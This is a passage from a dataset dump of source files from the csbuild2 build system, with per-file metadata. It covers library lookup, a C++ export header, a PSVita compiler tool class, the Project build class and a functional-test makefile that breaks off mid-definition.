{}\n\n\tdef _searchForLib(libraryName, libraryDir, libExt):\n\t\t# Add the extension if it's not already there.\n\t\tfilename = \"{}{}\".format(libraryName, libExt) if not libraryName.endswith(libExt) else libraryName\n\n\t\t# Try searching for the library name as it is.\n\t\tlog.Info(\"Looking for library {} in directory {}...\".format(filename, libraryDir))\n\t\tfullPath = os.path.join(libraryDir, filename)\n\n\t\t# Check if the file exists at the current path.\n\t\tif os.access(fullPath, os.F_OK):\n\t\t\treturn fullPath\n\n\t\t# If the library couldn't be found, simulate posix by adding the \"lib\" prefix.\n\t\tfilename = \"lib{}\".format(filename)\n\n\t\tlog.Info(\"Looking for library {} in directory {}...\".format(filename, libraryDir))\n\t\tfullLibraryPath = os.path.join(libraryDir, filename)\n\n\t\t# Check if the modified filename exists at the current path.\n\t\tif os.access(fullLibraryPath, os.F_OK):\n\t\t\treturn fullLibraryPath\n\n\t\treturn None\n\n\tfor libraryName in libNames:\n\t\tif os.access(libraryName, os.F_OK):\n\t\t\tabspath = os.path.abspath(libraryName)\n\t\t\tlog.Info(\"... found {}\".format(abspath))\n\t\t\tfound[libraryName] = abspath\n\t\telse:\n\t\t\tfor libraryExt in libExts:\n\t\t\t\tfor libraryDir in libDirs:\n\t\t\t\t\t# Search for the library with the current extension.\n\t\t\t\t\tfullPath = _searchForLib(libraryName, libraryDir, libraryExt)\n\t\t\t\t\tif fullPath:\n\t\t\t\t\t\tlog.Info(\"... found {}\".format(fullPath))\n\t\t\t\t\t\tfound[libraryName] = fullPath\n\t\t\t\t\t\tbreak\n\n\t\t\tif libraryName not in found:\n\t\t\t\t# Failed to find the library in any of the provided directories.\n\t\t\t\tlog.Error(\"Failed to find library \\\"{}\\\".\".format(libraryName))\n\t\t\t\tnotFound.add(libraryName)\n\n\treturn None if notFound else found\n" }, { "alpha_fraction": 0.7234848737716675, "alphanum_fraction": 0.7310606241226196, "avg_line_length": 16.600000381469727, "blob_id": "f62f8954a8cff5bc491c19629c00348911eaaee9", "content_id": "e5465cc87ea8b74f4f4fc7947fe406f0cfe1e10b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 264, "license_type": "no_license", "max_line_length": 38, "num_lines": 15, "path": "/functional_tests/basic_cpp_test/libhello/libhello.hpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#pragma once\n\n#ifdef _WIN32\n#\tif defined(CSB_TARGET_STATIC)\n#\t\tdefine EXPORT\n#\telif defined(CSB_SHARED_LIBRARY)\n#\t\tdefine EXPORT __declspec(dllexport)\n#\telse\n#\t\tdefine EXPORT __declspec(dllimport)\n#\tendif\n#else\n#\tdefine EXPORT\n#endif\n\nEXPORT void goodbye_world();\n" }, { "alpha_fraction": 0.663802981376648, "alphanum_fraction": 0.6655212044715881, "avg_line_length": 34.876712799072266, "blob_id": "b52495be122352f4c435209aea6580d565093545", "content_id": "d69c983998cb9abed2efbbf3c742ac0c0df47d9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5238, "license_type": "no_license", "max_line_length": 121, "num_lines": 146, "path": "/csbuild/tools/cpp_compilers/psvita_cpp_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: psvita_cpp_compiler\n\t:synopsis: Implementation of the PSVita C/C++ compiler tool.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nfrom .cpp_compiler_base import CppCompilerBase\n\nfrom ..common.sony_tool_base import PsVitaBaseTool\nfrom ..common.tool_traits import HasDebugLevel, HasOptimizationLevel\nfrom ... import log\nfrom ..._utils import response_file, shared_globals\n\nDebugLevel = HasDebugLevel.DebugLevel\nOptimizationLevel = HasOptimizationLevel.OptimizationLevel\n\nclass PsVitaCppCompiler(PsVitaBaseTool, CppCompilerBase):\n\t\"\"\"\n\tPSVita C/C++ compiler tool implementation.\n\t\"\"\"\n\tsupportedPlatforms = { \"Windows\" }\n\tsupportedArchitectures = { \"arm\" }\n\toutputFiles = { \".o\" }\n\n\tdef __init__(self, projectSettings):\n\t\tPsVitaBaseTool.__init__(self, projectSettings)\n\t\tCppCompilerBase.__init__(self, projectSettings)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tPsVitaBaseTool.SetupForProject(self, project)\n\t\tCppCompilerBase.SetupForProject(self, project)\n\n\tdef _getOutputFiles(self, project, inputFile):\n\t\tintDirPath = project.GetIntermediateDirectory(inputFile)\n\t\tfilename = os.path.splitext(os.path.basename(inputFile.filename))[0] + \".o\"\n\t\treturn tuple({ os.path.join(intDirPath, filename) })\n\n\tdef _getCommand(self, project, inputFile, isCpp):\n\t\tcmdExe = self._getComplierName()\n\t\tcmd = self._getCustomArgs(isCpp) \\\n\t\t\t+ self._getOptimizationArgs() \\\n\t\t\t+ self._getDebugArgs() \\\n\t\t\t+ self._getLanguageStandardArgs(isCpp) \\\n\t\t\t+ self._getPreprocessorArgs() \\\n\t\t\t+ self._getIncludeDirectoryArgs() \\\n\t\t\t+ self._getOutputFileArgs(project, inputFile) \\\n\t\t\t+ self._getInputFileArgs(inputFile)\n\n\t\tinputFileBasename = os.path.basename(inputFile.filename)\n\t\tresponseFile = response_file.ResponseFile(project, \"{}-{}\".format(inputFile.uniqueDirectoryId, inputFileBasename), cmd)\n\n\t\tif shared_globals.showCommands:\n\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\treturn [cmdExe, \"@{}\".format(responseFile.filePath)]\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getComplierName(self):\n\t\tbinPath = os.path.join(self._psVitaSdkPath, \"host_tools\", \"build\", \"bin\")\n\t\texeName = \"psp2snc.exe\"\n\n\t\treturn os.path.join(binPath, exeName)\n\n\tdef _getCustomArgs(self, isCpp):\n\t\treturn self._globalFlags + self._cxxFlags if isCpp else self._cFlags\n\n\tdef _getInputFileArgs(self, inputFile):\n\t\treturn [\"-c\", inputFile.filename]\n\n\tdef _getOutputFileArgs(self, project, inputFile):\n\t\toutputFiles = self._getOutputFiles(project, inputFile)\n\t\treturn [\"-o\", outputFiles[0]]\n\n\tdef _getPreprocessorArgs(self):\n\t\targs = []\n\t\targs.extend([\"-D{}\".format(d) for d in self._defines])\n\t\targs.extend([\"-U{}\".format(u) for u in self._undefines])\n\t\treturn args\n\n\tdef _getIncludeDirectoryArgs(self):\n\t\targs = []\n\n\t\tfor dirPath in self._includeDirectories:\n\t\t\targs.extend([\n\t\t\t\t\"-I{}\".format(os.path.abspath(dirPath)),\n\t\t\t])\n\n\t\t# Add the PSVita system include directories.\n\t\targs.extend([\n\t\t\t\"-I{}\".format(os.path.join(self._psVitaSdkPath, \"target\", \"include\")),\n\t\t\t\"-I{}\".format(os.path.join(self._psVitaSdkPath, \"target\", \"include_common\")),\n\t\t])\n\n\t\treturn args\n\n\tdef _getDebugArgs(self):\n\t\tif self._debugLevel != DebugLevel.Disabled:\n\t\t\treturn [\"-g\"]\n\t\treturn []\n\n\tdef _getOptimizationArgs(self):\n\t\targ = {\n\t\t\tOptimizationLevel.Size: \"s\",\n\t\t\tOptimizationLevel.Speed: \"d\",\n\t\t\tOptimizationLevel.Max: \"3\",\n\t\t}\n\t\treturn [\"-O{}\".format(arg.get(self._optLevel, \"0\"))]\n\n\tdef _getLanguageStandardArgs(self, isSourceCpp):\n\t\t# No argument for the C language standard.\n\t\targ = \"-Xstd={}\".format(self._cxxStandard) if self._cxxStandard and isSourceCpp else None\n\t\treturn [arg]\n" }, { "alpha_fraction": 0.7255929708480835, "alphanum_fraction": 0.7261171340942383, "avg_line_length": 36.68395233154297, "blob_id": "daf53fc909e2070398c91a29178a7b734d467a51", "content_id": "96dd2a1cd39d63b535527a486056753fcb3c9cdd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15262, "license_type": "no_license", "max_line_length": 198, "num_lines": 405, "path": "/csbuild/_build/project.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: project\n\t:synopsis: A project that's been finalized for building.\n\t\tUnlike ProjectPlan, Project is a completely finalized class specialized on a single toolchain, and is ready to build\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport collections\nimport threading\n\nimport csbuild\nfrom .. import log, perf_timer\nfrom .._utils import ordered_set, shared_globals, StrType, BytesType, PlatformString, PlatformUnicode\nfrom .._utils.decorators import TypeChecked\nfrom .._utils.string_abc import String\nfrom .._build import input_file\nfrom ..toolchain.toolchain import Toolchain\n\nclass UserData(object):\n\t\"\"\"\n\tWrapper around a dict that allows its contents to be accessed as if they were class properties instead\n\t:param dataDict: dict to wrap\n\t:type dataDict: dict\n\t\"\"\"\n\tdef __init__(self, dataDict):\n\t\tself.dataDict = dataDict\n\n\tdef __getattr__(self, item):\n\t\treturn object.__getattribute__(self, \"dataDict\")[item]\n\n\tdef __contains__(self, item):\n\t\treturn item in self.dataDict\n\nclass Project(object):\n\t\"\"\"\n\tA finalized, concrete project\n\n\t:param name: The project's name. Must be unique.\n\t:type name: str\n\t:param workingDirectory: The location on disk containing the project's files, which should be examined to collect source files.\n\t\tIf autoDiscoverSourceFiles is False, this parameter is ignored.\n\t:type workingDirectory: String\n\t:param depends: List of names of other prjects this one depends on.\n\t:type depends: list(String)\n\t:param priority: Priority in the build queue, used to cause this project to get built first in its dependency ordering. Higher number means higher priority.\n\t:type priority: int\n\t:param ignoreDependencyOrdering: Treat priority as a global value and use priority to raise this project above, or lower it below, the dependency order\n\t:type ignoreDependencyOrdering: bool\n\t:param autoDiscoverSourceFiles: If False, do not automatically search the working directory for files, but instead only build files that are manually added.\n\t:type autoDiscoverSourceFiles: bool\n\t:param autoResolveRpaths: Automatically add RPATH arguments for linked shared libraries.\n\t:type autoResolveRpaths: bool\n\t:param projectSettings: Finalized settings from the project plan\n\t:type projectSettings: dict\n\t:param toolchainName: Toolchain name\n\t:type toolchainName: str, bytes\n\t:param archName: Architecture name\n\t:type archName: str, bytes\n\t:param targetName: Target name\n\t:type targetName: str, bytes\n\t:param scriptDir: Directory of the script where this project is defined\n\t:type scriptDir: str, bytes\n\t\"\"\"\n\n\t_lock = threading.Lock()\n\n\tdef __init__(self, name, workingDirectory, depends, priority, ignoreDependencyOrdering, autoDiscoverSourceFiles, autoResolveRpaths, projectSettings, toolchainName, archName, targetName, scriptDir):\n\t\twith perf_timer.PerfTimer(\"Project init\"):\n\n\t\t\tself.name = name\n\t\t\tself.workingDirectory = workingDirectory\n\t\t\tself.dependencyNames = depends\n\t\t\tself.dependencies = []\n\t\t\tself.priority = priority\n\t\t\tself.ignoreDependencyOrdering = ignoreDependencyOrdering\n\t\t\tself.autoDiscoverSourceFiles = autoDiscoverSourceFiles\n\t\t\tself.autoResolveRpaths = autoResolveRpaths\n\n\t\t\tself.toolchainName = toolchainName\n\t\t\tself.architectureName = archName\n\t\t\tself.targetName = targetName\n\n\t\t\tself.scriptDir = scriptDir\n\n\t\t\t#: type: dict[str, set[str]]\n\t\t\tself.builtThisRun = {}\n\n\t\t\tlog.Build(\"Preparing build tasks for {}\", self)\n\n\t\t\t#: type: set[Tool]\n\t\t\tself.tools = projectSettings[\"tools\"] - projectSettings.get(\"disabledTools\", set())\n\t\t\tself.checkers = projectSettings.get(\"checkers\", {})\n\n\t\t\tif shared_globals.runMode == shared_globals.RunMode.GenerateSolution:\n\t\t\t\ttools = []\n\t\t\t\tgeneratorTools = shared_globals.allGenerators[shared_globals.solutionGeneratorType].projectTools\n\t\t\t\tfor tool in self.tools:\n\t\t\t\t\tif tool in generatorTools:\n\t\t\t\t\t\ttools.append(tool)\n\t\t\t\tself.tools = tools\n\n\t\t\tself.userData = UserData(projectSettings.get(\"_userData\", {}))\n\n\t\t\tdef _convertSet(toConvert):\n\t\t\t\tret = toConvert.__class__()\n\t\t\t\tfor item in toConvert:\n\t\t\t\t\tret.add(_convertItem(item))\n\t\t\t\treturn ret\n\n\t\t\tdef _convertDict(toConvert):\n\t\t\t\tfor key, val in toConvert.items():\n\t\t\t\t\ttoConvert[key] = _convertItem(val)\n\t\t\t\treturn toConvert\n\n\t\t\tdef _convertList(toConvert):\n\t\t\t\tfor i, item in enumerate(toConvert):\n\t\t\t\t\ttoConvert[i] = _convertItem(item)\n\t\t\t\treturn toConvert\n\n\t\t\tdef _convertItem(toConvert):\n\t\t\t\tif isinstance(toConvert, list):\n\t\t\t\t\treturn _convertList(toConvert)\n\t\t\t\tif isinstance(toConvert, (dict, collections.OrderedDict)):\n\t\t\t\t\treturn _convertDict(toConvert)\n\t\t\t\tif isinstance(toConvert, (set, ordered_set.OrderedSet)):\n\t\t\t\t\treturn _convertSet(toConvert)\n\t\t\t\tif isinstance(toConvert, (StrType, BytesType)):\n\t\t\t\t\treturn self.FormatMacro(toConvert)\n\t\t\t\treturn toConvert\n\n\t\t\twith perf_timer.PerfTimer(\"Macro formatting\"):\n\t\t\t\t# We set self.settings here because _convertItem calls FormatMacro and FormatMacro uses self.settings\n\t\t\t\tself.settings = projectSettings\n\t\t\t\tself.settings = _convertItem(projectSettings)\n\n\t\t\tself.toolchain = Toolchain(self.settings, *self.tools, checkers=self.checkers)\n\n\t\t\tself.projectType = self.settings.get(\"projectType\", csbuild.ProjectType.Application)\n\n\t\t\t#: type: set[str]\n\t\t\tself.excludeFiles = self.settings.get(\"excludeFiles\", set())\n\t\t\t#: type: set[str]\n\t\t\tself.excludeDirs = self.settings.get(\"excludeDirs\", set())\n\t\t\t#: type: set[str]\n\t\t\tself.sourceFiles = self.settings.get(\"sourceFiles\", set())\n\t\t\t#: type: set[str]\n\t\t\tself.sourceDirs = self.settings.get(\"sourceDirs\", set())\n\n\t\t\t#: type: str\n\t\t\tself.intermediateDir = os.path.join(\n\t\t\t\tself.scriptDir,\n\t\t\t\tself.settings.get(\n\t\t\t\t\t\"intermediateDir\",\n\t\t\t\t\tos.path.join(\n\t\t\t\t\t\t\"intermediate\",\n\t\t\t\t\t\tself.toolchainName,\n\t\t\t\t\t\tself.architectureName,\n\t\t\t\t\t\tself.targetName,\n\t\t\t\t\t\tself.name\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\n\t\t\t#: type: str\n\t\t\tself.outputDir = os.path.join(\n\t\t\t\tself.scriptDir,\n\t\t\t\tself.settings.get(\n\t\t\t\t\t\"outputDir\",\n\t\t\t\t\tos.path.join(\n\t\t\t\t\t\t\"out\",\n\t\t\t\t\t\tself.toolchainName,\n\t\t\t\t\t\tself.architectureName,\n\t\t\t\t\t\tself.targetName,\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\n\t\t\t#: type: str\n\t\t\tself.csbuildDir = os.path.join(self.scriptDir, \".csbuild\")\n\n\t\t\tif not os.access(self.csbuildDir, os.F_OK):\n\t\t\t\tos.makedirs(self.csbuildDir)\n\n\t\t\tself.lastRunArtifacts = shared_globals.settings.Get(repr(self)+\".artifacts\", collections.OrderedDict())\n\n\t\t\tself.artifacts = collections.OrderedDict()\n\n\t\t\tself.outputName = self.settings.get(\"outputName\", self.name)\n\n\t\t\t# Stub projects will not be built, so they don't need intermediate or output directories.\n\t\t\tif self.projectType != csbuild.ProjectType.Stub:\n\t\t\t\tif not os.access(self.intermediateDir, os.F_OK):\n\t\t\t\t\tos.makedirs(self.intermediateDir)\n\t\t\t\tif not os.access(self.outputDir, os.F_OK):\n\t\t\t\t\tos.makedirs(self.outputDir)\n\n\t\t\t#: type: dict[str, set[csbuild._build.input_file.InputFile]]\n\t\t\tself.inputFiles = {}\n\n\t\t\tself.RediscoverFiles()\n\n\tdef __repr__(self):\n\t\treturn \"{} ({}-{}-{})\".format(self.name, self.toolchainName, self.architectureName, self.targetName)\n\n\tdef FormatMacro(self, toConvert):\n\t\t\"\"\"\n\t\tFormat a string containing macros with data from the project.\n\t\ti.e., in a project with toolchainName = msvc, FormatMacro(\"{toolchainName}.foo\") would return \"msvc.foo\"\n\t\tThis will also convert any values of type unicode (in python2) or bytes (in python3) to the platform-appropriate\n\t\tstr type.\n\n\t\t:param toConvert: The macroized string to convert\n\t\t:type toConvert: str, bytes\n\t\t:return: The converted string\n\t\t:rtype: str\n\t\t\"\"\"\n\t\t# TODO: This could be optimized:\n\t\t# Make a proxy class that gets items from the list of valid items\n\t\t# and convert them as we come across them, using memoization to avoid redundant\n\t\t# conversions. If we do that, we could do each string in one pass.\n\t\tif \"{\" in toConvert:\n\t\t\tprev = \"\"\n\t\t\twhile toConvert != prev:\n\t\t\t\tlog.Info(\"Formatting {}\", toConvert)\n\t\t\t\tprev = toConvert\n\t\t\t\ttoConvert = toConvert.format(\n\t\t\t\t\tname=self.name,\n\t\t\t\t\tworkingDirectory=self.workingDirectory,\n\t\t\t\t\tdependencyNames=self.dependencyNames,\n\t\t\t\t\tpriority=self.priority,\n\t\t\t\t\tignoreDependencyOrdering=self.ignoreDependencyOrdering,\n\t\t\t\t\tautoDiscoverSourceFiles=self.autoDiscoverSourceFiles,\n\t\t\t\t\tsettings=self.settings,\n\t\t\t\t\ttoolchainName=self.toolchainName,\n\t\t\t\t\tarchitectureName=self.architectureName,\n\t\t\t\t\ttargetName=self.targetName,\n\t\t\t\t\tuserData=self.userData,\n\t\t\t\t\t**self.settings\n\t\t\t\t)\n\t\t\t\tlog.Info(\" => {}\", toConvert)\n\t\treturn PlatformString(toConvert)\n\n\tdef ResolveDependencies(self):\n\t\t\"\"\"\n\t\tCalled after shared_globals.projectMap is filled out, this will populate the dependencies map.\n\t\t\"\"\"\n\t\tfor name in self.dependencyNames:\n\t\t\tself.dependencies.append(shared_globals.projectMap[self.toolchainName][self.architectureName][self.targetName][name])\n\n\t@TypeChecked(inputs=(input_file.InputFile, list, ordered_set.OrderedSet, type(None)), artifact=String)\n\tdef AddArtifact(self, inputs, artifact):\n\t\t\"\"\"\n\t\tAdd an artifact - i.e., a file created by the build\n\t\t:param inputs: Inputs being used to generate this artifact\n\t\t:type inputs: input_file.InputFile or list[input_file.InputFile] or ordered_set.OrderedSet[input_file.InputFile]\n\t\t:param artifact: absolute path to the file\n\t\t:type artifact: str\n\t\t\"\"\"\n\t\tif shared_globals.runMode == shared_globals.RunMode.GenerateSolution:\n\t\t\tif artifact not in self.artifacts.get(inputs, {}):\n\t\t\t\tself.artifacts.setdefault(inputs, ordered_set.OrderedSet()).add(artifact)\n\t\t\treturn\n\n\t\tif inputs is not None:\n\t\t\tif isinstance(inputs, input_file.InputFile):\n\t\t\t\tinputs = [inputs]\n\t\t\tinputs = tuple(sorted(i.filename for i in inputs))\n\t\tif artifact not in self.artifacts.get(inputs, {}):\n\t\t\tself.artifacts.setdefault(inputs, ordered_set.OrderedSet()).add(artifact)\n\t\t\tshared_globals.settings.Save(repr(self)+\".artifacts\", self.artifacts)\n\n\t@TypeChecked(inputs=(input_file.InputFile, list, ordered_set.OrderedSet))\n\tdef GetLastResult(self, inputs):\n\t\t\"\"\"\n\t\tGet the list of files that were created from a set of inputs in the last run.\n\n\t\t:param inputs: The input or inputs being used for this compile unit.\n\t\t:type inputs: input_file.InputFile or list[input_file.InputFile] or ordered_set.OrderedSet[input_file.InputFile]\n\t\t:return: The list of outputs from the last run\n\t\t:rtype: ordered_set.OrderedSet[str]\n\t\t\"\"\"\n\t\tif isinstance(inputs, input_file.InputFile):\n\t\t\tinputs = [inputs]\n\t\tinputs = tuple(sorted(i.filename for i in inputs))\n\t\treturn self.lastRunArtifacts.get(inputs, None)\n\n\tdef ClearArtifacts(self):\n\t\t\"\"\"Remove the artifacts for this project from the settings\"\"\"\n\t\tshared_globals.settings.Delete(repr(self)+\".artifacts\")\n\n\t@TypeChecked(inputFile=input_file.InputFile, _return=StrType)\n\tdef GetIntermediateDirectory(self, inputFile):\n\t\t\"\"\"\n\t\tGet the unique, intermediate directory path for an input file. The directory will be created if it does not exist.\n\n\t\t:param inputFile: The input file to use for constructing the directory.\n\t\t:type inputFile: :class:`csbuild.input_file.InputFile`\n\t\t:return: Unique intermediate directory path.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tdirectory = os.path.join(self.intermediateDir, self.name, inputFile.uniqueDirectoryId)\n\n\t\t#TODO: Investigate a lock-free solution to creating this directory.\n\t\tif not os.access(directory, os.F_OK):\n\t\t\t# Lock in case multiple threads get here at the same time.\n\t\t\t#pylint: disable=not-context-manager\n\t\t\twith Project._lock:\n\t\t\t\t# If the directory still does not exist, create it.\n\t\t\t\tif not os.access(directory, os.F_OK):\n\t\t\t\t\tos.makedirs(directory)\n\t\treturn PlatformUnicode(directory)\n\n\tdef RediscoverFiles(self):\n\t\t\"\"\"\n\t\t(Re)-Run source file discovery.\n\t\tIf autoDiscoverSourceFiles is enabled, this will recursively search the working directory and all extra directories\n\t\tto find source files.\n\t\tManually specified source files are then added to this list.\n\t\tNote that even if autoDiscoverSourceFiles is disabled, this must be called again in order to update the source\n\t\tfile list after a preBuildStep.\n\t\t\"\"\"\n\t\twith perf_timer.PerfTimer(\"File discovery\"):\n\t\t\tlog.Info(\"Discovering files for {}...\", self)\n\t\t\tself.inputFiles = {}\n\n\t\t\tsearchDirectories = ordered_set.OrderedSet(self.sourceDirs)\n\n\t\t\tif self.autoDiscoverSourceFiles:\n\t\t\t\tsearchDirectories |= ordered_set.OrderedSet([self.workingDirectory])\n\n\t\t\textensionList = self.toolchain.GetSearchExtensions()\n\n\t\t\texcludeFiles = [\n\t\t\t\tos.path.abspath(os.path.join(self.workingDirectory, filename))\n\t\t\t\tfor filename in self.excludeFiles\n\t\t\t]\n\n\t\t\twith perf_timer.PerfTimer(\"Walking working dir\"):\n\t\t\t\tfor sourceDir in searchDirectories:\n\t\t\t\t\tlog.Build(\"Collecting files from {}\", sourceDir)\n\t\t\t\t\tfor root, _, filenames in os.walk(sourceDir):\n\t\t\t\t\t\tif not filenames:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tabsroot = os.path.abspath(root)\n\t\t\t\t\t\tif absroot in self.excludeDirs:\n\t\t\t\t\t\t\tif absroot != self.csbuildDir:\n\t\t\t\t\t\t\t\tlog.Info(\"Skipping dir {}\", root)\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tif \".csbuild\" in root \\\n\t\t\t\t\t\t\t\tor root.startswith(self.intermediateDir) \\\n\t\t\t\t\t\t\t\tor (root.startswith(self.outputDir) and self.outputDir != self.workingDirectory):\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tif absroot == self.csbuildDir or absroot.startswith(self.csbuildDir):\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tfound = False\n\t\t\t\t\t\tfor testDir in self.excludeDirs:\n\t\t\t\t\t\t\tif absroot.startswith(testDir):\n\t\t\t\t\t\t\t\tfound = True\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tif found:\n\t\t\t\t\t\t\tif not absroot.startswith(self.csbuildDir):\n\t\t\t\t\t\t\t\tlog.Info(\"Skipping directory {}\", root)\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tlog.Info(\"Looking in directory {}\", root)\n\t\t\t\t\t\twith perf_timer.PerfTimer(\"Collecting files\"):\n\t\t\t\t\t\t\tfor extension in extensionList:\n\t\t\t\t\t\t\t\tlog.Info(\"Checking for {}\", extension)\n\t\t\t\t\t\t\t\tself.inputFiles.setdefault(extension, ordered_set.OrderedSet()).update(\n\t\t\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t\t\tinput_file.InputFile(\n\t\t\t\t\t\t\t\t\t\t\tos.path.join(absroot, filename)\n\t\t\t\t\t\t\t\t\t\t) for filename in filenames if os.path.splitext(filename)[1] == extension\n\t\t\t\t\t\t\t\t\t\tand os.path.join(absroot, filename) not in self.lastRunArtifacts\n\t\t\t\t\t\t\t\t\t\tand os.path.join(absroot, filename) not in excludeFiles\n\t\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t\t\t)\n\n\t\t\twith perf_timer.PerfTimer(\"Processing source files\"):\n\t\t\t\tfor filename in self.sourceFiles:\n\t\t\t\t\textension = os.path.splitext(filename)[1]\n\t\t\t\t\tself.inputFiles.setdefault(extension, ordered_set.OrderedSet()).add(input_file.InputFile(filename))\n\n\t\t\tlog.Info(\"Discovered {}\", self.inputFiles)\n" }, { "alpha_fraction": 0.747826099395752, "alphanum_fraction": 0.7532919049263, "avg_line_length": 31.45967674255371, "blob_id": "b35051773f6440ecb5a7c5a5ade6d30653c2dfeb", "content_id": "a1a5cd39b78604654131588aa0b741ab1db67306", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4025, "license_type": "no_license", "max_line_length": 116, "num_lines": 124, "path": "/functional_tests/cpp_features_test/make.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: make\n\t:synopsis: Makefile for this test\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\n\ncsbuild.SetOutputDirectory(\"out\")\n\n# pylint: disable=invalid-name,missing-docstring\ndef defineProjectSettings(projectName, debugLevel, optLevel, useStaticRuntime, useDebugRuntime, defines, undefines):\n\t#TODO: Disable the msvc compiler warning: D9025 : overriding '/DIMPLICIT_DEFINE' with '/UIMPLICIT_DEFINE'\n\tcsbuild.SetDebugLevel(debugLevel)\n\tcsbuild.SetOptimizationLevel(optLevel)\n\tcsbuild.SetStaticRuntime(useStaticRuntime)\n\tcsbuild.SetDebugRuntime(useDebugRuntime)\n\tcsbuild.AddDefines(\"IMPLICIT_DEFINE\", *defines)\n\tcsbuild.AddUndefines(*undefines)\n\tcsbuild.SetOutput(projectName, csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"hello_world\", \"hello_world\"):\n\twith csbuild.Target(\"nosymbols_noopt_dynamic_release\"):\n\t\tdefineProjectSettings(\n\t\t\t\"hello_world\",\n\t\t\tcsbuild.DebugLevel.Disabled,\n\t\t\tcsbuild.OptimizationLevel.Disabled,\n\t\t\tFalse,\n\t\t\tFalse,\n\t\t\t[],\n\t\t\t[],\n\t\t)\n\twith 